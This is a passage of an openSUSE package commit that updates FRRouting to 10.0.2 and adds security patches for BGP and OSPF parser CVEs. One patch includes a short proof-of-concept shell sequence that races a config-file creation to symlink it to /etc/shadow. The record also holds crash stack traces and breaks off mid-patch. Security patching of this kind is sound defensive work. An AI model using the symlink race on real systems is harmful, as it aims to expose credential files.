From a775fc8d7f701313528ef562543dfb02630825d4f0e2ab0804aafcd7ccf99885 Mon Sep 17 00:00:00 2001 From: Erico Mendonca Date: Tue, 1 Oct 2024 19:38:40 +0000 Subject: [PATCH] - Update to frr 10.0.2 release providing fix for CVE-2024-44070 and other issues, see https://frrouting.org/release/10.0.2/ - Removed patch included in the sources: [- 0002-bgpd-Check-the-actual-remaining-stream-length-before.patch] OBS-URL: https://build.opensuse.org/package/show/network/frr?expand=0&rev=79 --- .gitattributes | 23 + .gitignore | 1 + 0001-disable-zmq-test.patch | 25 + ...ctual-remaining-stream-length-before.patch | 51 ++ ..._USER-install-chown-commands-to-avoi.patch | 93 ++++ ...e-backslash-from-declare-check-regex.patch | 29 + 0005-root-ok-in-account-frr.pam.patch | 33 ++ ...es-for-Long-lived-Graceful-Restart-c.patch | 48 ++ ...sure-stream-received-has-enough-data.patch | 155 ++++++ ...the-first-byte-of-ORF-header-if-we-a.patch | 29 + ...ess-NLRIs-if-the-attribute-length-is.patch | 100 ++++ ...s-withdraw-for-tunnel-encapsulation-.patch | 131 +++++ ...ld-fix-11808-to-avoid-infinite-loops.patch | 48 ++ ...pec-to-no-attribute-means-a-implicit.patch | 37 ++ ...tory-attributes-more-carefully-for-U.patch | 115 ++++ ...EACH_NLRI-malformed-packets-with-ses.patch | 121 +++++ ...s-withdrawn-to-avoid-unwanted-handli.patch | 109 ++++ ...ling-NLRIs-if-we-received-MP_UNREACH.patch | 90 ++++ ...ond-end-of-stream-of-labeled-unicast.patch | 58 ++ 0018-bgpd-Flowspec-overflow-issue.patch | 37 ++ ...n-receiving-BGP-Prefix-SID-attribute.patch | 121 +++++ ...spfd-Solved-crash-in-OSPF-TE-parsing.patch | 37 ++ ...ved-crash-in-RI-parsing-with-OSPF-TE.patch | 67 +++ ...d-Correct-Opaque-LSA-Extended-parser.patch | 109 ++++ ...rotect-call-to-get_edge-in-ospf_te.c.patch | 82 +++ frr-10.0.1.tar.gz | 3 + frr-10.0.2.tar.gz | 3 + frr-8.4.tar.gz | 3 + frr-tmpfiles.d | 1 + frr.changes | 510 ++++++++++++++++++ frr.spec | 504 +++++++++++++++++ harden_frr.service.patch | 42 ++ 32 files changed, 2815 insertions(+) create mode 100644 .gitattributes create mode 100644 .gitignore create mode 100644 0001-disable-zmq-test.patch create mode 100644 0002-bgpd-Check-the-actual-remaining-stream-length-before.patch create mode 100644 0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch create mode 100644 0004-tools-remove-backslash-from-declare-check-regex.patch create mode 100644 0005-root-ok-in-account-frr.pam.patch create mode 100644 0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch create mode 100644 0007-bgpd-Ensure-stream-received-has-enough-data.patch create mode 100644 0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch create mode 100644 0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch create mode 100644 0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch create mode 100644 0011-babeld-fix-11808-to-avoid-infinite-loops.patch create mode 100644 0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch create mode 100644 0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch create mode 100644 0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch create mode 100644 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch create mode 100644 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch create mode 100644 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch create mode 100644 0018-bgpd-Flowspec-overflow-issue.patch create mode 100644 0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch create mode 100644 0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch create mode 100644 0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch create mode 100644 0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch create mode 100644 0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch create mode 100644 frr-10.0.1.tar.gz create mode 100644 frr-10.0.2.tar.gz create mode 100644 frr-8.4.tar.gz create mode 100644 frr-tmpfiles.d create mode 100644 frr.changes create mode 100644 frr.spec create mode 100644 harden_frr.service.patch diff --git a/.gitattributes b/.gitattributes new file mode 100644 index 0000000..9b03811 --- /dev/null +++ b/.gitattributes @@ -0,0 +1,23 @@ +## Default LFS +*.7z filter=lfs diff=lfs merge=lfs -text +*.bsp filter=lfs diff=lfs merge=lfs -text +*.bz2 filter=lfs diff=lfs merge=lfs -text +*.gem filter=lfs diff=lfs merge=lfs -text +*.gz filter=lfs diff=lfs merge=lfs -text +*.jar filter=lfs diff=lfs merge=lfs -text +*.lz filter=lfs diff=lfs merge=lfs -text +*.lzma filter=lfs diff=lfs merge=lfs -text +*.obscpio filter=lfs diff=lfs merge=lfs -text +*.oxt filter=lfs diff=lfs merge=lfs -text +*.pdf filter=lfs diff=lfs merge=lfs -text +*.png filter=lfs diff=lfs merge=lfs -text +*.rpm filter=lfs diff=lfs merge=lfs -text +*.tbz filter=lfs diff=lfs merge=lfs -text +*.tbz2 filter=lfs diff=lfs merge=lfs -text +*.tgz filter=lfs diff=lfs merge=lfs -text +*.ttf filter=lfs diff=lfs merge=lfs -text +*.txz filter=lfs diff=lfs merge=lfs -text +*.whl filter=lfs diff=lfs merge=lfs -text +*.xz filter=lfs diff=lfs merge=lfs -text +*.zip filter=lfs diff=lfs merge=lfs -text +*.zst filter=lfs diff=lfs merge=lfs -text diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..57affb6 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +.osc diff --git a/0001-disable-zmq-test.patch b/0001-disable-zmq-test.patch new file mode 100644 index 0000000..8d59a16 --- /dev/null +++ b/0001-disable-zmq-test.patch @@ -0,0 +1,25 @@ +From a19581f960db4c5f4f3b759e2d7ecf3e9ac73381 Mon Sep 17 00:00:00 2001 +From: Ruben Torrero Marijnissen +Date: Mon, 21 Dec 2020 18:36:43 +0000 +Subject: [PATCH] tests: disable zeromq tests due to build service timeouts +References: bsc#1180217 +--- + tests/lib/test_zmq.py | 3 +-- + 1 file changed, 1 insertion(+), 2 deletions(-) + +diff --git a/tests/lib/test_zmq.py b/tests/lib/test_zmq.py +index 1f8ee5416..b298fe7b5 100644 +--- a/tests/lib/test_zmq.py ++++ b/tests/lib/test_zmq.py +@@ -5,8 +5,7 @@ import os + program = "./test_zmq" + + @pytest.mark.skipif( +- 'S["ZEROMQ_TRUE"]=""\n' not in open("../config.status").readlines(), +- reason="ZEROMQ not enabled", ++ reason="Test disabled due to intermittent build service timeouts" + ) + def test_refout(self): + return super(TestZMQ, self).test_refout() +-- +2.29.2 diff --git a/0002-bgpd-Check-the-actual-remaining-stream-length-before.patch b/0002-bgpd-Check-the-actual-remaining-stream-length-before.patch new file mode 100644 index 0000000..edfa30d --- /dev/null +++ b/0002-bgpd-Check-the-actual-remaining-stream-length-before.patch @@ -0,0 +1,51 @@ +From 605485a7c470f6e49c3f5712f2c4692fea3019e7 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Wed, 31 Jul 2024 08:35:14 +0300 +Subject: [PATCH] bgpd: Check the actual remaining stream length before taking + TLV value +Upstream: yes +References: CVE-2024-44070,bsc#1229438,gh#FRRouting/frr#16502 + +``` + 0 0xb50b9f898028 in __sanitizer_print_stack_trace (/home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/.libs/bgpd+0x368028) (BuildId: 3292703ed7958b20076550c967f879db8dc27ca7) + 1 0xb50b9f7ed8e4 in fuzzer::PrintStackTrace() (/home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/.libs/bgpd+0x2bd8e4) (BuildId: 3292703ed7958b20076550c967f879db8dc27ca7) + 2 0xb50b9f7d4d9c in fuzzer::Fuzzer::CrashCallback() (/home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/.libs/bgpd+0x2a4d9c) (BuildId: 3292703ed7958b20076550c967f879db8dc27ca7) + 3 0xe0d12d7469cc (linux-vdso.so.1+0x9cc) (BuildId: 1a77697e9d723fe22246cfd7641b140c427b7e11) + 4 0xe0d12c88f1fc in __pthread_kill_implementation nptl/pthread_kill.c:43:17 + 5 0xe0d12c84a678 in gsignal signal/../sysdeps/posix/raise.c:26:13 + 6 0xe0d12c83712c in abort stdlib/abort.c:79:7 + 7 0xe0d12d214724 in _zlog_assert_failed /home/ubuntu/frr-public/frr_public_private-libfuzzer/lib/zlog.c:789:2 + 8 0xe0d12d1285e4 in stream_get /home/ubuntu/frr-public/frr_public_private-libfuzzer/lib/stream.c:324:3 + 9 0xb50b9f8e47c4 in bgp_attr_encap /home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/bgp_attr.c:2758:3 + 10 0xb50b9f8dcd38 in bgp_attr_parse /home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/bgp_attr.c:3783:10 + 11 0xb50b9faf74b4 in bgp_update_receive /home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/bgp_packet.c:2383:20 + 12 0xb50b9faf1dcc in bgp_process_packet /home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/bgp_packet.c:4075:11 + 13 0xb50b9f8c90d0 in LLVMFuzzerTestOneInput /home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/bgp_main.c:582:3 +``` + +Reported-by: Iggy Frankovic +Signed-off-by: Donatas Abraitis +(cherry picked from commit 0998b38e4d61179441f90dd7e7fd6a3a8b7bd8c5) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 40e074d058..4ebb45e3de 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -2727,6 +2727,14 @@ static int bgp_attr_encap(struct bgp_attr_parser_args *args) + args->total); + } + ++ if (STREAM_READABLE(BGP_INPUT(peer)) < sublength) { ++ zlog_err("Tunnel Encap attribute sub-tlv length %d exceeds remaining stream length %zu", ++ sublength, STREAM_READABLE(BGP_INPUT(peer))); ++ return bgp_attr_malformed(args, ++ BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); ++ } ++ + /* alloc and copy sub-tlv */ + /* TBD make sure these are freed when attributes are released */ + tlv = XCALLOC(MTYPE_ENCAP_TLV, +-- +2.43.0 + diff --git a/0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch b/0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch new file mode 100644 index 0000000..7279f97 --- /dev/null +++ b/0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch @@ -0,0 +1,93 @@ +From 401053f3ccc7be3a6a976f6f7f1674bdeb3c983e Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Thu, 20 Oct 2022 09:10:22 +0300 +References: bsc#1204124,CVE-2022-42917,https://github.com/FRRouting/frr/pull/12157 +Upstream: submitted +Subject: [PATCH] tools: Run as FRR_USER `install/chown` commands to avoid race + conditions + +This is due to CVE-2022-42917: https://bugzilla.suse.com/show_bug.cgi?id=1204124 + +install/chown is in most cases (as I tested) is enough, but still, can be racy. + +Tested on Linux/OpenBSD/NetBSD/FreeBSD, seems a unified way to do this. + +For Linux `runuser` can be used, but *BSD do not have this command. + +Proof of concept: + +``` +% sudo su - frr +[sudo] password for donatas: +su: warning: cannot change directory to /nonexistent: No such file or directory +frr@donatas-laptop:/home/donatas$ cd /etc/frr/ +frr@donatas-laptop:/etc/frr$ rm -f zebra.conf; inotifywait -e CREATE .; rm -f zebra.conf; ln -s /etc/shadow zebra.conf +Setting up watches. +Watches established. +./ CREATE zebra.conf +frr@donatas-laptop:/etc/frr$ ls -la zebra.conf +lrwxrwxrwx 1 frr frr 11 spal. 20 09:25 zebra.conf -> /etc/shadow +frr@donatas-laptop:/etc/frr$ cat zebra.conf +cat: zebra.conf: Permission denied +frr@donatas-laptop:/etc/frr$ +``` + +On the other terminal do: + +``` +/usr/lib/frr/frrinit.sh restart +``` + +Signed-off-by: Donatas Abraitis + +diff --git a/tools/frr.in b/tools/frr.in +index e9f1122834..5f3f425a1e 100755 +--- a/tools/frr.in ++++ b/tools/frr.in +@@ -96,10 +96,10 @@ check_daemon() + # check for config file + if [ -n "$2" ]; then + if [ ! -r "$C_PATH/$1-$2.conf" ]; then +- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" /dev/null "$C_PATH/$1-$2.conf" ++ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" /dev/null \"$C_PATH/$1-$2.conf\"" + fi + elif [ ! -r "$C_PATH/$1.conf" ]; then +- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" /dev/null "$C_PATH/$1.conf" ++ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" /dev/null \"$C_PATH/$1.conf\"" + fi + fi + return 0 +@@ -524,7 +524,7 @@ convert_daemon_prios + + if [ ! -d $V_PATH ]; then + echo "Creating $V_PATH" +- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" -d "$V_PATH" ++ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" -d \"$V_PATH\"" + chmod gu+x "${V_PATH}" + fi + +diff --git a/tools/frrcommon.sh.in b/tools/frrcommon.sh.in +index 61f1abb378..4d5d688d57 100755 +--- a/tools/frrcommon.sh.in ++++ b/tools/frrcommon.sh.in +@@ -143,7 +143,7 @@ daemon_prep() { + + cfg="$C_PATH/$daemon${inst:+-$inst}.conf" + if [ ! -r "$cfg" ]; then +- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" /dev/null "$cfg" ++ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" /dev/null \"$cfg\"" + fi + return 0 + } +@@ -161,7 +161,7 @@ daemon_start() { + [ "$MAX_FDS" != "" ] && ulimit -n "$MAX_FDS" > /dev/null 2> /dev/null + daemon_prep "$daemon" "$inst" || return 1 + if test ! -d "$V_PATH"; then +- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" -d "$V_PATH" ++ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" -d \"$V_PATH\"" + chmod gu+x "${V_PATH}" + fi + +-- +2.35.3 + diff --git a/0004-tools-remove-backslash-from-declare-check-regex.patch b/0004-tools-remove-backslash-from-declare-check-regex.patch new file mode 100644 index 0000000..3ec363d --- /dev/null +++ b/0004-tools-remove-backslash-from-declare-check-regex.patch @@ -0,0 +1,29 @@ +From 3474b220e036497e6bbe23428645217c275f9f87 Mon Sep 17 00:00:00 2001 +From: Marius Tomaschewski +Date: Fri, 11 Nov 2022 12:26:04 +0100 +References: https://github.com/FRRouting/frr/pull/12307 +Upstream: submitted +Subject: [PATCH] tools: remove backslash from declare check regex + +The backslash in `grep -q '^declare \-a'` is not needed and +causes `grep: warning: stray \ before -` warning in grep-3.8. +--- + tools/frrcommon.sh.in | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/tools/frrcommon.sh.in b/tools/frrcommon.sh.in +index 61f1abb378..3c16c27c6d 100755 +--- a/tools/frrcommon.sh.in ++++ b/tools/frrcommon.sh.in +@@ -335,7 +335,7 @@ if [ -z "$FRR_PATHSPACE" ]; then + load_old_config "/etc/sysconfig/frr" + fi + +-if { declare -p watchfrr_options 2>/dev/null || true; } | grep -q '^declare \-a'; then ++if { declare -p watchfrr_options 2>/dev/null || true; } | grep -q '^declare -a'; then + log_warning_msg "watchfrr_options contains a bash array value." \ + "The configured value is intentionally ignored since it is likely wrong." \ + "Please remove or fix the setting." +-- +2.35.3 + diff --git a/0005-root-ok-in-account-frr.pam.patch b/0005-root-ok-in-account-frr.pam.patch new file mode 100644 index 0000000..a051878 --- /dev/null +++ b/0005-root-ok-in-account-frr.pam.patch @@ -0,0 +1,33 @@ +From cb467471b31cd653e758bc3f82fffe7c44654796 Mon Sep 17 00:00:00 2001 +From: Marius Tomaschewski +Date: Fri, 11 Nov 2022 14:50:12 +0100 +References: https://github.com/FRRouting/frr/pull/12308 +Upstream: submitted +Subject: [PATCH] pam: declare root as sufficient frr pam account + +https://github.com/FRRouting/frr/pull/11465 enabled account verification, +but the pam config declares rootok as sufficient in authentication only +and not in account verification, what causes warning in the log: + +vtysh[3747]: pam_warn(frr:account): function=[pam_sm_acct_mgmt] + flags=0 service=[frr] terminal=[] user=[root] + ruser=[] rhost=[] +--- + redhat/frr.pam | 1 + + 1 file changed, 1 insertion(+) + +diff --git a/redhat/frr.pam b/redhat/frr.pam +index 5cef5d9d74..17a62f1999 100644 +--- a/redhat/frr.pam ++++ b/redhat/frr.pam +@@ -5,6 +5,7 @@ + # Only allow root (and possibly wheel) to use this because enable access + # is unrestricted. + auth sufficient pam_rootok.so ++account sufficient pam_rootok.so + + # Uncomment the following line to implicitly trust users in the "wheel" group. + #auth sufficient pam_wheel.so trust use_uid +-- +2.35.3 + diff --git a/0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch b/0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch new file mode 100644 index 0000000..92e4394 --- /dev/null +++ b/0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch @@ -0,0 +1,48 @@ +From d95229c9ba4c8ff99dfc644dd2d1e9e172fe3faf Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Fri, 24 Mar 2023 09:55:23 +0200 +Upstream: yes +References: bsc#1211248,CVE-2023-31489,https://github.com/FRRouting/frr/pull/13100/commits/b1d33ec293e8e36fbb8766252f3b016d268e31ce +Subject: [PATCH] bgpd: Check 7 bytes for Long-lived Graceful-Restart + capability + +It's not 4 bytes, it was assuming the same as Graceful-Restart tuples. + +LLGR has more 3 bytes (Long-lived Stale Time). + +Signed-off-by: Donatas Abraitis +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_open.c b/bgpd/bgp_open.c +index d1667fac26..907e75e76b 100644 +--- a/bgpd/bgp_open.c ++++ b/bgpd/bgp_open.c +@@ -599,12 +599,24 @@ static int bgp_capability_restart(struct peer *peer, + static int bgp_capability_llgr(struct peer *peer, + struct capability_header *caphdr) + { ++/* ++ * +--------------------------------------------------+ ++ * | Address Family Identifier (16 bits) | ++ * +--------------------------------------------------+ ++ * | Subsequent Address Family Identifier (8 bits) | ++ * +--------------------------------------------------+ ++ * | Flags for Address Family (8 bits) | ++ * +--------------------------------------------------+ ++ * | Long-lived Stale Time (24 bits) | ++ * +--------------------------------------------------+ ++ */ ++#define BGP_CAP_LLGR_MIN_PACKET_LEN 7 + struct stream *s = BGP_INPUT(peer); + size_t end = stream_get_getp(s) + caphdr->length; + + SET_FLAG(peer->cap, PEER_CAP_LLGR_RCV); + +- while (stream_get_getp(s) + 4 <= end) { ++ while (stream_get_getp(s) + BGP_CAP_LLGR_MIN_PACKET_LEN <= end) { + afi_t afi; + safi_t safi; + iana_afi_t pkt_afi = stream_getw(s); +-- +2.35.3 + diff --git a/0007-bgpd-Ensure-stream-received-has-enough-data.patch b/0007-bgpd-Ensure-stream-received-has-enough-data.patch new file mode 100644 index 0000000..aba1134 --- /dev/null +++ b/0007-bgpd-Ensure-stream-received-has-enough-data.patch @@ -0,0 +1,155 @@ +From 6d307ec2f5f5f9827f340a08941e6f78d09d1876 Mon Sep 17 00:00:00 2001 +From: Donald Sharp +Date: Tue, 6 Dec 2022 10:23:11 -0500 +Upstream: yes +References: bsc#1211249,CVE-2023-31490,https://github.com/FRRouting/frr/pull/12454/commits/06431bfa7570f169637ebb5898f0b0cc3b010802 +Subject: [PATCH] bgpd: Ensure stream received has enough data + +BGP_PREFIX_SID_SRV6_L3_SERVICE attributes must not +fully trust the length value specified in the nlri. +Always ensure that the amount of data we need to read +can be fullfilled. + +Reported-by: Iggy Frankovic +Signed-off-by: Donald Sharp +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index b7d0958bac..c6177a1b93 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -2748,9 +2748,21 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length, + uint8_t sid_type, sid_flags; + char buf[BUFSIZ]; + ++ /* ++ * Check that we actually have at least as much data as ++ * specified by the length field ++ */ ++ if (STREAM_READABLE(peer->curr) < length) { ++ flog_err( ++ EC_BGP_ATTR_LEN, ++ "Prefix SID specifies length %hu, but only %zu bytes remain", ++ length, STREAM_READABLE(peer->curr)); ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, ++ args->total); ++ } ++ + if (type == BGP_PREFIX_SID_LABEL_INDEX) { +- if (STREAM_READABLE(peer->curr) < length +- || length != BGP_PREFIX_SID_LABEL_INDEX_LENGTH) { ++ if (length != BGP_PREFIX_SID_LABEL_INDEX_LENGTH) { + flog_err(EC_BGP_ATTR_LEN, + "Prefix SID label index length is %hu instead of %u", + length, BGP_PREFIX_SID_LABEL_INDEX_LENGTH); +@@ -2772,12 +2784,8 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length, + /* Store label index; subsequently, we'll check on + * address-family */ + attr->label_index = label_index; +- } +- +- /* Placeholder code for the IPv6 SID type */ +- else if (type == BGP_PREFIX_SID_IPV6) { +- if (STREAM_READABLE(peer->curr) < length +- || length != BGP_PREFIX_SID_IPV6_LENGTH) { ++ } else if (type == BGP_PREFIX_SID_IPV6) { ++ if (length != BGP_PREFIX_SID_IPV6_LENGTH) { + flog_err(EC_BGP_ATTR_LEN, + "Prefix SID IPv6 length is %hu instead of %u", + length, BGP_PREFIX_SID_IPV6_LENGTH); +@@ -2791,10 +2799,7 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length, + stream_getw(peer->curr); + + stream_get(&ipv6_sid, peer->curr, 16); +- } +- +- /* Placeholder code for the Originator SRGB type */ +- else if (type == BGP_PREFIX_SID_ORIGINATOR_SRGB) { ++ } else if (type == BGP_PREFIX_SID_ORIGINATOR_SRGB) { + /* + * ietf-idr-bgp-prefix-sid-05: + * Length is the total length of the value portion of the +@@ -2819,19 +2824,6 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length, + args->total); + } + +- /* +- * Check that we actually have at least as much data as +- * specified by the length field +- */ +- if (STREAM_READABLE(peer->curr) < length) { +- flog_err(EC_BGP_ATTR_LEN, +- "Prefix SID Originator SRGB specifies length %hu, but only %zu bytes remain", +- length, STREAM_READABLE(peer->curr)); +- return bgp_attr_malformed( +- args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, +- args->total); +- } +- + /* + * Check that the portion of the TLV containing the sequence of + * SRGBs corresponds to a multiple of the SRGB size; to get +@@ -2855,12 +2847,8 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length, + stream_get(&srgb_base, peer->curr, 3); + stream_get(&srgb_range, peer->curr, 3); + } +- } +- +- /* Placeholder code for the VPN-SID Service type */ +- else if (type == BGP_PREFIX_SID_VPN_SID) { +- if (STREAM_READABLE(peer->curr) < length +- || length != BGP_PREFIX_SID_VPN_SID_LENGTH) { ++ } else if (type == BGP_PREFIX_SID_VPN_SID) { ++ if (length != BGP_PREFIX_SID_VPN_SID_LENGTH) { + flog_err(EC_BGP_ATTR_LEN, + "Prefix SID VPN SID length is %hu instead of %u", + length, BGP_PREFIX_SID_VPN_SID_LENGTH); +@@ -2896,39 +2884,22 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length, + attr->srv6_vpn->sid_flags = sid_flags; + sid_copy(&attr->srv6_vpn->sid, &ipv6_sid); + attr->srv6_vpn = srv6_vpn_intern(attr->srv6_vpn); +- } +- +- /* Placeholder code for the SRv6 L3 Service type */ +- else if (type == BGP_PREFIX_SID_SRV6_L3_SERVICE) { +- if (STREAM_READABLE(peer->curr) < length) { ++ } else if (type == BGP_PREFIX_SID_SRV6_L3_SERVICE) { ++ if (STREAM_READABLE(peer->curr) < 1) { + flog_err( + EC_BGP_ATTR_LEN, +- "Prefix SID SRv6 L3-Service length is %hu, but only %zu bytes remain", +- length, STREAM_READABLE(peer->curr)); +- return bgp_attr_malformed(args, +- BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, +- args->total); ++ "Prefix SID SRV6 L3 Service not enough data left, it must be at least 1 byte"); ++ return bgp_attr_malformed( ++ args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, ++ args->total); + } +- + /* ignore reserved */ + stream_getc(peer->curr); + + return bgp_attr_srv6_service(args); + } +- + /* Placeholder code for Unsupported TLV */ + else { +- +- if (STREAM_READABLE(peer->curr) < length) { +- flog_err( +- EC_BGP_ATTR_LEN, +- "Prefix SID SRv6 length is %hu - too long, only %zu remaining in this UPDATE", +- length, STREAM_READABLE(peer->curr)); +- return bgp_attr_malformed( +- args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, +- args->total); +- } +- + if (bgp_debug_update(peer, NULL, NULL, 1)) + zlog_debug( + "%s attr Prefix-SID sub-type=%u is not supported, skipped", +-- +2.35.3 + diff --git a/0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch b/0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch new file mode 100644 index 0000000..2ba1cfc --- /dev/null +++ b/0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch @@ -0,0 +1,29 @@ +From a6c5ef48cb086b94a5b911af4ee9f675213fb14b Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Sun, 20 Aug 2023 22:15:27 +0300 +Upstream: yes +References: CVE-2023-41360,bsc#1214739,https://github.com/FRRouting/frr/pull/14245 +Subject: [PATCH] bgpd: Don't read the first byte of ORF header if we are ahead + of stream + +Reported-by: Iggy Frankovic iggyfran@amazon.com +Signed-off-by: Donatas Abraitis +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index 72d6a92317..4947dbc21d 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -2375,7 +2375,8 @@ static int bgp_route_refresh_receive(struct peer *peer, bgp_size_t size) + * and 7 bytes of ORF Address-filter entry from + * the stream + */ +- if (*p_pnt & ORF_COMMON_PART_REMOVE_ALL) { ++ if (p_pnt < p_end && ++ *p_pnt & ORF_COMMON_PART_REMOVE_ALL) { + if (bgp_debug_neighbor_events(peer)) + zlog_debug( + "%pBP rcvd Remove-All pfxlist ORF request", +-- +2.35.3 + diff --git a/0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch b/0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch new file mode 100644 index 0000000..bd53710 --- /dev/null +++ b/0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch @@ -0,0 +1,100 @@ +From e51ca641b4a96e575be069aeea922e31f7b8dfa4 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Tue, 22 Aug 2023 22:52:04 +0300 +Upstream: yes +References: CVE-2023-41358,bsc#1214735,https://github.com/FRRouting/frr/pull/14260 +Subject: [PATCH] bgpd: Do not process NLRIs if the attribute length is + zero + +``` +3 0x00007f423aa42476 in __GI_raise (sig=sig@entry=11) at ../sysdeps/posix/raise.c:26 +4 0x00007f423aef9740 in core_handler (signo=11, siginfo=0x7fffc414deb0, context=) at lib/sigevent.c:246 +5 +6 0x0000564dea2fc71e in route_set_aspath_prepend (rule=0x564debd66d50, prefix=0x7fffc414ea30, object=0x7fffc414e400) + at bgpd/bgp_routemap.c:2258 +7 0x00007f423aeec7e0 in route_map_apply_ext (map=, prefix=prefix@entry=0x7fffc414ea30, + match_object=match_object@entry=0x7fffc414e400, set_object=set_object@entry=0x7fffc414e400, pref=pref@entry=0x0) at lib/routemap.c:2690 +8 0x0000564dea2d277e in bgp_input_modifier (peer=peer@entry=0x7f4238f59010, p=p@entry=0x7fffc414ea30, attr=attr@entry=0x7fffc414e770, + afi=afi@entry=AFI_IP, safi=safi@entry=SAFI_UNICAST, rmap_name=rmap_name@entry=0x0, label=0x0, num_labels=0, dest=0x564debdd5130) + at bgpd/bgp_route.c:1772 +9 0x0000564dea2df762 in bgp_update (peer=peer@entry=0x7f4238f59010, p=p@entry=0x7fffc414ea30, addpath_id=addpath_id@entry=0, + attr=0x7fffc414eb50, afi=afi@entry=AFI_IP, safi=, safi@entry=SAFI_UNICAST, type=9, sub_type=0, prd=0x0, label=0x0, + num_labels=0, soft_reconfig=0, evpn=0x0) at bgpd/bgp_route.c:4374 +10 0x0000564dea2e2047 in bgp_nlri_parse_ip (peer=0x7f4238f59010, attr=attr@entry=0x7fffc414eb50, packet=0x7fffc414eaf0) + at bgpd/bgp_route.c:6249 +11 0x0000564dea2c5a58 in bgp_nlri_parse (peer=peer@entry=0x7f4238f59010, attr=attr@entry=0x7fffc414eb50, + packet=packet@entry=0x7fffc414eaf0, mp_withdraw=mp_withdraw@entry=false) at bgpd/bgp_packet.c:339 +12 0x0000564dea2c5d66 in bgp_update_receive (peer=peer@entry=0x7f4238f59010, size=size@entry=109) at bgpd/bgp_packet.c:2024 +13 0x0000564dea2c901d in bgp_process_packet (thread=) at bgpd/bgp_packet.c:2933 +14 0x00007f423af0bf71 in event_call (thread=thread@entry=0x7fffc414ee40) at 